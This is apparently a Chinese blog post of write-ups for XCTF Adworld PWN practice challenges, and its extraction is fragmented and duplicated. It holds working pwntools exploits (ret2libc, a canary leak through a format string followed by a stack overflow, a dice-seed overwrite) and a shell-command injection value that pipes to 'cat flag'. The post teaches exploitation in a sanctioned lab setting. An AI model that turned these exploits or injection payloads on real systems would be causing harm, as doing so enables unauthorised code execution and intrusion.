-
-
攻防世界-PWN-高手进阶区-难度3到4-全部题解
-
发表于: 2021-6-12 02:00 18981
-
通过攻防世界的一些入门难度的题目来学习最基本的漏洞利用技巧,以及提高代码审计的能力。传送门:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=1
总结可能用到的知识点:
放上我常用的做题模板:
需要打服务器的时候直接加个参数就可以:
《CTF竞赛指南》上有详解。
《CTF竞赛指南》上有详解。
这个题目涉及的漏洞是悬空指针(dangling pointer)和UAF:
可以看到,指针在用户确定退出之前就已经free了,free之后也没有及时指向NULL。这导致我们可以重新申请format_buf指向的堆内存,然后给予其新的值。再来看看show部分的代码:
可以看到如果设置了环境变量会有不少提示信息,我们这里设置一个临时变量:
然后看到程序中有system
函数,而且部分参数是我们提供的输入;我们应该想到这里可以用'
闭合命令,然后用管道执行一个新的命令。程序的本意是想执行这样的一条命令:
我们想要执行这样一个命令:
根据以上思路,利用悬空指针漏洞绕过检查找出flag的值:
拿到程序先看下信息:
我们需要绕过金丝雀,再看程序关键流程如下:
非常友好的题目(骗新人入坑
两个有漏洞的函数:
第一个函数的printf函数的格式化字符串由用户控制,第二个函数可从一开始的定义看出buf的缓冲区最多只有0x90的大小,而程序却可以接受0x100大小的输入,这将导致栈溢出。
最终,随便点击函数列表中的函数,发现了win函数:
到此,漏洞利用的一个思路基本可表示为一下三步:
由以上几步做exp如下:
运行下:
简单题:
这题有点意思:
有几个函数点击去看看,大概能猜到题目说的email是迷惑信息:
所以查看下汇编:
接受完数据后,程序直接跳到栈上某地址,调试中确定位置:
最终exp:
exp:
题目:
可以发现我注释的代码,利用这段代码可以向着栈内写一个字节的数据,所以这是一个简单的ret2win咯,只要将返回地址byte by byte改成win函数即可:
然而实际打过去服务器发现:
看上去调用bash失败了,这咋办呢。看了师傅们的wp我发现原来可以直接以这种形式返回shell:
最终exp:
发现是js命令,通过help()查看帮助,发现可以用os.system调用命令:
最基础的x64栈溢出:
最坑的是给出./libc-2.23.so
找偏移打过去发现不对:
后来还是用LibcSearch搞定:
嗯这题也有点意思:
可以看到被调用的函数将传入的参数直接拷贝在局部变量,由于传入的参数,被调用函数的变量都在栈上,所以栈的视图大概是:
如果用传统的rop:
拷贝完栈中是这样:
要覆盖栈,所以需要padding(414141),但正因为有padding,所以必须要有gadget帮助跳过padding:
这样拷贝后就可以正常利用了:
exp如下:
简单题目:
简单的字符串格式化漏洞,先gdb调试出offset是12,然后直接用工具自动生成payload:
这个题目用到一个知识点.fini.array中的函数在main结束时被调用,所以需要修改其中的函数地址为_start,这样就可以完成攻击。攻击用到的system@plt和_start地址:
由于.fini.array中原有的数据和_start高两位都一样,只需要修改后两位,就可以那么按照从小到大写入原则,按照如下顺序写入数据:
exp如下
补充链接:详解64位静态编译程序的fini_array劫持及ROP攻击 https://www.freebuf.com/articles/system/226003.html
嗯这题命中了我知识的盲点:数组索引越界。先看看保护措施:
RWX有点显眼,第一次遇到这个记号。在程序中添加一个note之后用vmmap看下:
发现了heap可执行,其实这时候已经猜到可能是将shellcode放入堆中,但没想到如何劫持rip到堆上。这时候看了大佬的博客:https://blog.csdn.net/seaaseesa/article/details/103003167豁然开朗,原来是利用数组索引不受控制,把got表劫持了hh:
简单题目,不要跟着题目思路走,需要利用溢出替换hash值:
题目代码比较简单:
可以发现明显的栈溢出的漏洞,但是第二次循环时必须让read返回0才能顺利return,可以用这样的语句关闭流:
但之后都不能写入流了,除非重开程序。那么这就要求我们一次输入完成ROP利用链条。在程序中搜到的一些信息:
这里参考了大佬的wp:https://blog.csdn.net/seaaseesa/article/details/102992887
利用思路总结如下:
优化过的exp如下:
import
sys
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
rv
=
lambda
: io.recv()
rl
=
lambda
a
=
False
: io.recvline(a)
ru
=
lambda
a,b
=
True
: io.recvuntil(a,b)
rn
=
lambda
x : io.recvn(x)
se
=
lambda
x : io.send(x)
sl
=
lambda
x : io.sendline(x)
sa
=
lambda
a,b : io.sendafter(a,b)
sla
=
lambda
a,b : io.sendlineafter(a,b)
sconnect
=
lambda
: io.interactive()
context.log_level
=
"DEBUG"
pwn_file
=
'./pwn7'
elf
=
ELF(pwn_file)
if
len
(sys.argv) <
2
:
IS_LOCAL
=
1
io
=
process(pwn_file)
else
:
IS_LOCAL
=
0
sys_argv
=
sys.argv[
1
].split(
':'
)
io
=
remote(sys_argv[
0
],
int
(sys_argv[
1
]))
#---------------------------------------------------------
payload
=
'1'
+
'\x00'
*
6
+
'\xFF\x00'
'''
if IS_LOCAL:
gdb.attach(io,"break *0x8048824\nc")
pause()
'''
se(payload)
puts_addr
=
u32(io.recv()[:
4
])
if
IS_LOCAL:
libc
=
ELF(
'/lib/i386-linux-gnu/libc.so.6'
)
libc_base
=
printf_addr
-
libc.sym[
'printf'
]
system_addr
=
libc_base
+
libc.sym[
'system'
]
else
:
libc
=
ELF(
'libc6-i386_2.23-0ubuntu11.2_amd64.so'
)
libc_base
=
printf_addr
-
libc.sym[
'printf'
]
system_addr
=
libc_base
+
libc.sym[
'system'
]
#or choose to use LibcSearcher
'''
libc=LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
'''
log.info(
'puts_addr: 0x%x'
%
puts_addr)
log.info(
'system_addr: 0x%x'
%
system_addr)
log.info(
'str_bin_sh: 0x%x'
%
str_bin_sh)
payload
=
'A'
*
235
+
p32(system_addr)
+
p32(
0xdeadbeef
)
+
p32(str_bin_sh)
se(payload)
sconnect()
import
sys
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
rv
=
lambda
: io.recv()
rl
=
lambda
a
=
False
: io.recvline(a)
ru
=
lambda
a,b
=
True
: io.recvuntil(a,b)
rn
=
lambda
x : io.recvn(x)
se
=
lambda
x : io.send(x)
sl
=
lambda
x : io.sendline(x)
sa
=
lambda
a,b : io.sendafter(a,b)
sla
=
lambda
a,b : io.sendlineafter(a,b)
sconnect
=
lambda
: io.interactive()
context.log_level
=
"DEBUG"
pwn_file
=
'./pwn7'
elf
=
ELF(pwn_file)
if
len
(sys.argv) <
2
:
IS_LOCAL
=
1
io
=
process(pwn_file)
else
:
IS_LOCAL
=
0
sys_argv
=
sys.argv[
1
].split(
':'
)
io
=
remote(sys_argv[
0
],
int
(sys_argv[
1
]))
#---------------------------------------------------------
payload
=
'1'
+
'\x00'
*
6
+
'\xFF\x00'
'''
if IS_LOCAL:
gdb.attach(io,"break *0x8048824\nc")
pause()
'''
se(payload)
puts_addr
=
u32(io.recv()[:
4
])
if
IS_LOCAL:
libc
=
ELF(
'/lib/i386-linux-gnu/libc.so.6'
)
libc_base
=
printf_addr
-
libc.sym[
'printf'
]
system_addr
=
libc_base
+
libc.sym[
'system'
]
else
:
libc
=
ELF(
'libc6-i386_2.23-0ubuntu11.2_amd64.so'
)
libc_base
=
printf_addr
-
libc.sym[
'printf'
]
system_addr
=
libc_base
+
libc.sym[
'system'
]
#or choose to use LibcSearcher
'''
libc=LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
'''
log.info(
'puts_addr: 0x%x'
%
puts_addr)
log.info(
'system_addr: 0x%x'
%
system_addr)
log.info(
'str_bin_sh: 0x%x'
%
str_bin_sh)
payload
=
'A'
*
235
+
p32(system_addr)
+
p32(
0xdeadbeef
)
+
p32(str_bin_sh)
se(payload)
sconnect()
python exp.py
111.200
.
241.244
:
56070
python exp.py
111.200
.
241.244
:
56070
__int64 sub_400F8F()
{
__int64 result;
/
/
rax
char s[
16
];
/
/
[rsp
+
8h
] [rbp
-
20h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
18h
] [rbp
-
10h
]
v2
=
__readfsqword(
0x28u
);
free_400C7E(FORMAT_BUF_HEAP);
/
/
double free
free_400C7E(time_zone_heap);
__printf_chk(
1LL
,
"Are you sure you want to exit (y/N)? "
);
fflush(stdout);
fgets(s,
16
, stdin);
result
=
0LL
;
if
( (s[
0
] &
0xDF
)
=
=
'Y'
)
{
puts(
"OK, exiting."
);
result
=
1LL
;
}
return
result;
}
__int64 sub_400F8F()
{
__int64 result;
/
/
rax
char s[
16
];
/
/
[rsp
+
8h
] [rbp
-
20h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
18h
] [rbp
-
10h
]
v2
=
__readfsqword(
0x28u
);
free_400C7E(FORMAT_BUF_HEAP);
/
/
double free
free_400C7E(time_zone_heap);
__printf_chk(
1LL
,
"Are you sure you want to exit (y/N)? "
);
fflush(stdout);
fgets(s,
16
, stdin);
result
=
0LL
;
if
( (s[
0
] &
0xDF
)
=
=
'Y'
)
{
puts(
"OK, exiting."
);
result
=
1LL
;
}
return
result;
}
__int64 sub_400EA3()
{
char command[
2048
];
/
/
[rsp
+
8h
] [rbp
-
810h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
808h
] [rbp
-
10h
]
v2
=
__readfsqword(
0x28u
);
if
( FORMAT_BUF_HEAP )
{
__snprintf_chk(command,
2048LL
,
1LL
,
2048LL
,
"/bin/date -d @%d +'%s'"
, TIME, FORMAT_BUF_HEAP);
__printf_chk(
1LL
,
"Your formatted time is: "
);
fflush(stdout);
if
( getenv(
"DEBUG"
) )
__fprintf_chk(stderr,
1LL
,
"Running command: %s\n"
, command);
setenv(
"TZ"
, time_zone_heap,
1
);
system(command);
}
else
{
puts(
"You haven't specified a format!"
);
}
return
0LL
;
}
__int64 sub_400EA3()
{
char command[
2048
];
/
/
[rsp
+
8h
] [rbp
-
810h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
808h
] [rbp
-
10h
]
v2
=
__readfsqword(
0x28u
);
if
( FORMAT_BUF_HEAP )
{
__snprintf_chk(command,
2048LL
,
1LL
,
2048LL
,
"/bin/date -d @%d +'%s'"
, TIME, FORMAT_BUF_HEAP);
__printf_chk(
1LL
,
"Your formatted time is: "
);
fflush(stdout);
if
( getenv(
"DEBUG"
) )
__fprintf_chk(stderr,
1LL
,
"Running command: %s\n"
, command);
setenv(
"TZ"
, time_zone_heap,
1
);
system(command);
}
else
{
puts(
"You haven't specified a format!"
);
}
return
0LL
;
}
export DEBUG
=
1
export DEBUG
=
1
date
-
d @
1568880277
+
"%Y-%m-%d %H:%M:%S"
2019
-
09
-
19
16
:
04
:
37
date
-
d @
1568880277
+
"%Y-%m-%d %H:%M:%S"
2019
-
09
-
19
16
:
04
:
37
/
bin
/
date
-
d @
0
+
'%y'
| cat
'flag'
/
bin
/
date
-
d @
0
+
'%y'
| cat
'flag'
dc@ubuntu:~
/
playground$ .
/
time_formatter
Welcome to Mary's Unix Time Formatter!
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
1
Format
: b
strdup(
0x7fffffffd948
)
=
0x603420
Format
set
.
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
5
free(
0x603420
)
free((nil))
Are you sure you want to exit (y
/
N)? n
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
3
Time zone:
%
y
' | cat '
flag
strdup(
0x7fffffffd948
)
=
0x603420
# assert timeformat_buf == timezone
Time zone
set
.
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
4
Your formatted time
is
: Running command:
/
bin
/
date
-
d @
0
+
'%y'
| cat
'flag'
flag{ABCD}
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
> ^C
dc@ubuntu:~
/
playground$ .
/
time_formatter
Welcome to Mary's Unix Time Formatter!
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
1
Format
: b
strdup(
0x7fffffffd948
)
=
0x603420
Format
set
.
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
5
free(
0x603420
)
free((nil))
Are you sure you want to exit (y
/
N)? n
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
3
Time zone:
%
y
' | cat '
flag
strdup(
0x7fffffffd948
)
=
0x603420
# assert timeformat_buf == timezone
Time zone
set
.
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
>
4
Your formatted time
is
: Running command:
/
bin
/
date
-
d @
0
+
'%y'
| cat
'flag'
flag{ABCD}
1
)
Set
a time
format
.
2
)
Set
a time.
3
)
Set
a time zone.
4
)
Print
your time.
5
) Exit.
> ^C
dc@ubuntu:~
/
playground$
file
22e2d7579d2d4359a5a1735edddef631
22e2d7579d2d4359a5a1735edddef631
: ELF
64
-
bit LSB executable, x86
-
64
, version
1
(SYSV), dynamically linked, interpreter
/
lib64
/
ld
-
linux
-
x86
-
64.so
.
2
,
for
GNU
/
Linux
2.6
.
32
, BuildID[sha1]
=
b7971b84c2309bdb896e6e39073303fc13668a38, stripped
dc@ubuntu:~
/
playground$ pwn checksec
22e2d7579d2d4359a5a1735edddef631
[
*
]
'/home/dc/playground/22e2d7579d2d4359a5a1735edddef631'
Arch: amd64
-
64
-
little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
dc@ubuntu:~
/
playground$
file
22e2d7579d2d4359a5a1735edddef631
22e2d7579d2d4359a5a1735edddef631
: ELF
64
-
bit LSB executable, x86
-
64
, version
1
(SYSV), dynamically linked, interpreter
/
lib64
/
ld
-
linux
-
x86
-
64.so
.
2
,
for
GNU
/
Linux
2.6
.
32
, BuildID[sha1]
=
b7971b84c2309bdb896e6e39073303fc13668a38, stripped
dc@ubuntu:~
/
playground$ pwn checksec
22e2d7579d2d4359a5a1735edddef631
[
*
]
'/home/dc/playground/22e2d7579d2d4359a5a1735edddef631'
Arch: amd64
-
64
-
little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
void __fastcall __noreturn main(
int
a1, char
*
*
a2, char
*
*
a3)
{
int
v3;
/
/
[rsp
+
24h
] [rbp
-
Ch] BYREF
unsigned __int64 v4;
/
/
[rsp
+
28h
] [rbp
-
8h
]
v4
=
__readfsqword(
0x28u
);
sub_4009FF();
puts(
"Welcome to the battle ! "
);
puts(
"[Great Fairy] level pwned "
);
puts(
"Select your weapon "
);
while
(
1
)
{
while
(
1
)
{
sub_4009DA();
__isoc99_scanf(
"%d"
, &v3);
if
( v3 !
=
2
)
break
;
sub_4008EB();
}
if
( v3
=
=
3
)
{
puts(
"Bye "
);
exit(
0
);
}
if
( v3
=
=
1
)
sub_400960();
else
puts(
"Wrong!"
);
}
}
unsigned
int
sub_4009FF()
{
setvbuf(stdin,
0LL
,
1
,
0LL
);
setvbuf(stdout,
0LL
,
2
,
0LL
);
return
alarm(
0x14u
);
}
int
sub_4009DA()
{
puts(
"1. Stack Bufferoverflow Bug "
);
puts(
"2. Format String Bug "
);
return
puts(
"3. Exit the battle "
);
}
void __fastcall __noreturn main(
int
a1, char
*
*
a2, char
*
*
a3)
{
int
v3;
/
/
[rsp
+
24h
] [rbp
-
Ch] BYREF
unsigned __int64 v4;
/
/
[rsp
+
28h
] [rbp
-
8h
]
v4
=
__readfsqword(
0x28u
);
sub_4009FF();
puts(
"Welcome to the battle ! "
);
puts(
"[Great Fairy] level pwned "
);
puts(
"Select your weapon "
);
while
(
1
)
{
while
(
1
)
{
sub_4009DA();
__isoc99_scanf(
"%d"
, &v3);
if
( v3 !
=
2
)
break
;
sub_4008EB();
}
if
( v3
=
=
3
)
{
puts(
"Bye "
);
exit(
0
);
}
if
( v3
=
=
1
)
sub_400960();
else
puts(
"Wrong!"
);
}
}
unsigned
int
sub_4009FF()
{
setvbuf(stdin,
0LL
,
1
,
0LL
);
setvbuf(stdout,
0LL
,
2
,
0LL
);
return
alarm(
0x14u
);
}
int
sub_4009DA()
{
puts(
"1. Stack Bufferoverflow Bug "
);
puts(
"2. Format String Bug "
);
return
puts(
"3. Exit the battle "
);
}
unsigned __int64 sub_4008EB()
{
char buf[
136
];
/
/
[rsp
+
0h
] [rbp
-
90h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
88h
] [rbp
-
8h
]
v2
=
__readfsqword(
0x28u
);
memset(buf,
0
,
0x80uLL
);
read(
0
, buf,
0x7FuLL
);
printf(buf);
return
__readfsqword(
0x28u
) ^ v2;
}
unsigned __int64 sub_400960()
{
char buf[
136
];
/
/
[rsp
+
0h
] [rbp
-
90h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
88h
] [rbp
-
8h
]
v2
=
__readfsqword(
0x28u
);
memset(buf,
0
,
0x80uLL
);
read(
0
, buf,
0x100uLL
);
printf(
"-> %s\n"
, buf);
return
__readfsqword(
0x28u
) ^ v2;
}
unsigned __int64 sub_4008EB()
{
char buf[
136
];
/
/
[rsp
+
0h
] [rbp
-
90h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
88h
] [rbp
-
8h
]
v2
=
__readfsqword(
0x28u
);
memset(buf,
0
,
0x80uLL
);
read(
0
, buf,
0x7FuLL
);
printf(buf);
return
__readfsqword(
0x28u
) ^ v2;
}
unsigned __int64 sub_400960()
{
char buf[
136
];
/
/
[rsp
+
0h
] [rbp
-
90h
] BYREF
unsigned __int64 v2;
/
/
[rsp
+
88h
] [rbp
-
8h
]
v2
=
__readfsqword(
0x28u
);
memset(buf,
0
,
0x80uLL
);
read(
0
, buf,
0x100uLL
);
printf(
"-> %s\n"
, buf);
return
__readfsqword(
0x28u
) ^ v2;
}
int
sub_4008DA()
{
return
system(
"/bin/cat ./flag"
);
}
int
sub_4008DA()
{
return
system(
"/bin/cat ./flag"
);
}
from
pwn
import
*
context.log_level
=
"DEBUG"
io
=
process(
'./22e2d7579d2d4359a5a1735edddef631'
)
io.recv()
io.send(
'2\n'
)
io.send(
'%23$p\n'
)
canary
=
int
(io.recvline(),
16
)
log.info(
'canary == 0x%x'
%
canary)
io.recv()
io.send(
'1\n'
)
io.send(
'A'
*
0x88
+
p64(canary)
+
p64(
0xdeadbeef
)
+
p64(
0x4008DA
))
io.recv()
from
pwn
import
*
context.log_level
=
"DEBUG"
io
=
process(
'./22e2d7579d2d4359a5a1735edddef631'
)
io.recv()
io.send(
'2\n'
)
io.send(
'%23$p\n'
)
canary
=
int
(io.recvline(),
16
)
log.info(
'canary == 0x%x'
%
canary)
io.recv()
io.send(
'1\n'
)
io.send(
'A'
*
0x88
+
p64(canary)
+
p64(
0xdeadbeef
)
+
p64(
0x4008DA
))
io.recv()
dc@ubuntu:~
/
playground$ echo
'my_flag{123}'
> flag
dc@ubuntu:~
/
playground$ python payload_22e2.py
[
+
] Starting local process
'./22e2d7579d2d4359a5a1735edddef631'
argv
=
[
'./22e2d7579d2d4359a5a1735edddef631'
] : pid
85064
[DEBUG] Received
0x8f
bytes:
'Welcome to the battle ! \n'
'[Great Fairy] level pwned \n'
'Select your weapon \n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Sent
0x6
bytes:
'%23$p\n'
[DEBUG] Received
0x5a
bytes:
'0x433c813a1d175800\n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[
*
] canary
=
=
0x433c813a1d175800
[DEBUG] Sent
0x2
bytes:
'1\n'
[DEBUG] Sent
0xa0
bytes:
00000000
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
│AAAA│AAAA│AAAA│AAAA│
*
00000080
41
41
41
41
41
41
41
41
00
58
17
1d
3a
81
3c
43
│AAAA│AAAA│·X··│:·<C│
00000090
ef be ad de
00
00
00
00
da
08
40
00
00
00
00
00
│····│····│··@·│····│
000000a0
[DEBUG] Received
0x99
bytes:
'-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
'my_flag{123}\n'
dc@ubuntu:~
/
playground$ echo
'my_flag{123}'
> flag
dc@ubuntu:~
/
playground$ python payload_22e2.py
[
+
] Starting local process
'./22e2d7579d2d4359a5a1735edddef631'
argv
=
[
'./22e2d7579d2d4359a5a1735edddef631'
] : pid
85064
[DEBUG] Received
0x8f
bytes:
'Welcome to the battle ! \n'
'[Great Fairy] level pwned \n'
'Select your weapon \n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Sent
0x6
bytes:
'%23$p\n'
[DEBUG] Received
0x5a
bytes:
'0x433c813a1d175800\n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[
*
] canary
=
=
0x433c813a1d175800
[DEBUG] Sent
0x2
bytes:
'1\n'
[DEBUG] Sent
0xa0
bytes:
00000000
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
│AAAA│AAAA│AAAA│AAAA│
*
00000080
41
41
41
41
41
41
41
41
00
58
17
1d
3a
81
3c
43
│AAAA│AAAA│·X··│:·<C│
00000090
ef be ad de
00
00
00
00
da
08
40
00
00
00
00
00
│····│····│··@·│····│
000000a0
[DEBUG] Received
0x99
bytes:
'-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
'my_flag{123}\n'
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
se
=
lambda
x:io.send(x)
sl
=
lambda
x:io.sendline(x)
sa
=
lambda
x,y:io.sendafter(x,y)
rv
=
lambda
:io.recv()
sconnect
=
lambda
:io.interactive()
IS_LOCAL
=
0
context.log_level
=
"DEBUG"
pwn_file
=
'./dice_game'
elf
=
ELF(pwn_file)
if
IS_LOCAL:
io
=
process(pwn_file)
else
:
io
=
remote(
'111.200.241.244'
,
'55568'
)
#---------------------------------------------------------
payload
=
'A'
*
0x40
+
p64(
0
)
nums
=
[
2
,
5
,
4
,
2
,
6
,
2
,
5
,
1
,
4
,
2
,
3
,
2
,
3
,
2
,
6
,
5
,
1
,
1
,
5
,
5
,
6
,
3
,
4
,
4
,
3
,
3
,
3
,
2
,
2
,
2
,
6
,
1
,
1
,
1
,
6
,
4
,
2
,
5
,
2
,
5
,
4
,
4
,
4
,
6
,
3
,
2
,
3
,
3
,
6
,
1
]
sa(
"Welcome, let me know your name: "
,payload)
for
index
in
range
(
50
):
sa(
"Give me the point(1~6): "
,
str
(nums[index])
+
'\n'
)
rv()
print
(rv())
from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
se
=
lambda
x:io.send(x)
sl
=
lambda
x:io.sendline(x)
sa
=
lambda
x,y:io.sendafter(x,y)
rv
=
lambda
:io.recv()
sconnect
=
lambda
:io.interactive()
IS_LOCAL
=
0
context.log_level
=
"DEBUG"
pwn_file
=
'./dice_game'
elf
=
ELF(pwn_file)
if
IS_LOCAL:
io
=
process(pwn_file)
else
:
io
=
remote(
'111.200.241.244'
,
'55568'
)
#---------------------------------------------------------
payload
=
'A'
*
0x40
+
p64(
0
)
nums
=
[
2
,
5
,
4
,
2
,
6
,
2
,
5
,
1
,
4
,
2
,
3
,
2
,
3
,
2
,
6
,
5
,
1
,
1
,
5
,
5
,
6
,
3
,
4
,
4
,
3
,
3
,
3
,
2
,
2
,
2
,
6
,
1
,
1
,
1
,
6
,
4
,
2
,
5
,
2
,
5
,
4
,
4
,
4
,
6
,
3
,
2
,
3
,
3
,
6
,
1
]
sa(
"Welcome, let me know your name: "
,payload)
for
index
in
range
(
50
):
sa(
"Give me the point(1~6): "
,
str
(nums[index])
+
'\n'
)
rv()
print
(rv())
int
__cdecl main()
{
size_t v0;
/
/
ebx
char
input
[
32
];
/
/
[esp
+
10h
] [ebp
-
74h
] BYREF
_DWORD v3[
10
];
/
/
[esp
+
30h
] [ebp
-
54h
]
char name[
32
];
/
/
[esp
+
58h
] [ebp
-
2Ch
] BYREF
int
choice;
/
/
[esp
+
78h
] [ebp
-
Ch]
size_t index;
/
/
[esp
+
7Ch
] [ebp
-
8h
]
choice
=
1
;
v3[
0
]
=
sub_8048604;
v3[
1
]
=
sub_8048618;
v3[
2
]
=
sub_804862C;
v3[
3
]
=
sub_8048640;
v3[
4
]
=
sub_8048654;
v3[
5
]
=
sub_8048668;
v3[
6
]
=
sub_804867C;
v3[
7
]
=
sub_8048690;
v3[
8
]
=
sub_80486A4;
v3[
9
]
=
sub_80486B8;
puts(
"What is your name?"
);
printf(
"> "
);
fflush(stdout);
fgets(name,
32
, stdin);
sub_80485DD(name);
fflush(stdout);
printf(
"I should give you a pointer perhaps. Here: %x\n\n"
, sub_8048654);
fflush(stdout);
puts(
"Enter the string to be validate"
);
printf(
"> "
);
fflush(stdout);
__isoc99_scanf(
"%s"
,
input
);
/
/
may stack overflow
for
( index
=
0
; ;
+
+
index )
{
v0
=
index;
if
( v0 >
=
strlen(
input
) )
break
;
switch ( choice )
{
case
1
:
if
( sub_8048702(
input
[index]) )
choice
=
2
;
break
;
case
2
:
if
(
input
[index]
=
=
'@'
)
choice
=
3
;
break
;
case
3
:
if
( sub_804874C(
input
[index]) )
choice
=
4
;
break
;
case
4
:
if
(
input
[index]
=
=
'.'
)
choice
=
5
;
break
;
case
5
:
if
( sub_8048784(
input
[index]) )
choice
=
6
;
break
;
case
6
:
if
( sub_8048784(
input
[index]) )
choice
=
7
;
break
;
case
7
:
if
( sub_8048784(
input
[index]) )
choice
=
8
;
break
;
case
8
:
if
( sub_8048784(
input
[index]) )
choice
=
9
;
break
;
case
9
:
choice
=
10
;
break
;
default:
continue
;
}
}
(v3[
-
-
choice])();
return
fflush(stdout);
}
int
__cdecl main()
{
size_t v0;
/
/
ebx
char
input
[
32
];
/
/
[esp
+
10h
] [ebp
-
74h
] BYREF
_DWORD v3[
10
];
/
/
[esp
+
30h
] [ebp
-
54h
]
char name[
32
];
/
/
[esp
+
58h
] [ebp
-
2Ch
] BYREF
int
choice;
/
/
[esp
+
78h
] [ebp
-
Ch]
size_t index;
/
/
[esp
+
7Ch
] [ebp
-
8h
]
choice
=
1
;
v3[
0
]
=
sub_8048604;
v3[
1
]
=
sub_8048618;
v3[
2
]
=
sub_804862C;
v3[
3
]
=
sub_8048640;
v3[
4
]
=
sub_8048654;
v3[
5
]
=
sub_8048668;
v3[
6
]
=
sub_804867C;
v3[
7
]
=
sub_8048690;
v3[
8
]
=
sub_80486A4;
v3[
9
]
=
sub_80486B8;
puts(
"What is your name?"
);
printf(
"> "
);
fflush(stdout);
fgets(name,
32
, stdin);
sub_80485DD(name);
fflush(stdout);
printf(
"I should give you a pointer perhaps. Here: %x\n\n"
, sub_8048654);
fflush(stdout);
puts(
"Enter the string to be validate"
);
printf(
"> "
);
fflush(stdout);
__isoc99_scanf(
"%s"
,
input
);
/
/
may stack overflow
for
( index
=
0
; ;
+
+
index )
{
v0
=
index;
if
( v0 >
=
strlen(
input
) )
break
;
switch ( choice )
{
case
1
:
if
( sub_8048702(
input
[index]) )
choice
=
2
;
break
;
case
2
:
if
(
input
[index]
=
=
'@'
)
choice
=
3
;
break
;
case
3
:
if
( sub_804874C(
input
[index]) )
choice
=
4
;
break
;
case
4
:
if
(
input
[index]
=
=
'.'
)
choice
=
5
;
break
;
case
5
:
if
( sub_8048784(
input
[index]) )
choice
=
6
;
break
;
case
6
:
if
( sub_8048784(
input
[index]) )
choice
=
7
;
break
;
case
7
:
if
( sub_8048784(
input
[index]) )
choice
=
8
;
break
;
case
8
:
if
( sub_8048784(
input
[index]) )
choice
=
9
;
break
;
case
9
:
choice
=
10
;
break
;
default:
continue
;
}
}
(v3[
-
-
choice])();
return
fflush(stdout);
}
int
sub_8048604()
{
return
puts(
"Dude, you seriously think this is going to work. Where are the fancy @ and [dot], huh?"
);
}
int
sub_8048604()
{
return
puts(
"Dude, you seriously think this is going to work. Where are the fancy @ and [dot], huh?"
);
}
.text:
08048A40
mov ebx, [esp
+
7Ch
]
.text:
08048A44
lea eax, [esp
+
84h
+
input
]
.text:
08048A48
mov [esp], eax ; s
.text:
08048A4B
call _strlen
.text:
08048A50
cmp
ebx, eax
.text:
08048A52
jb loc_80488CF
.text:
08048A58
sub dword ptr [esp
+
78h
],
1
.text:
08048A5D
mov eax, [esp
+
78h
]
.text:
08048A61
mov eax, [esp
+
eax
*
4
+
30h
]
.text:
08048A65
call eax
.text:
08048A40
mov ebx, [esp
+
7Ch
]
.text:
08048A44
lea eax, [esp
+
84h
+
input
]
.text:
08048A48
mov [esp], eax ; s
.text:
08048A4B
call _strlen
.text:
08048A50
cmp
ebx, eax
.text:
08048A52
jb loc_80488CF
.text:
08048A58
sub dword ptr [esp
+
78h
],
1
.text:
08048A5D
mov eax, [esp
+
78h
]
.text:
08048A61
mov eax, [esp
+
eax
*
4
+
30h
]
.text:
08048A65
call eax
─────────────────────────────────────────────────────────────── code:x86:
32
────
0x8048a52
jb
0x80488cf
0x8048a58
sub DWORD PTR [esp
+
0x78
],
0x1
0x8048a5d
mov eax, DWORD PTR [esp
+
0x78
]
→
0x8048a61
mov eax, DWORD PTR [esp
+
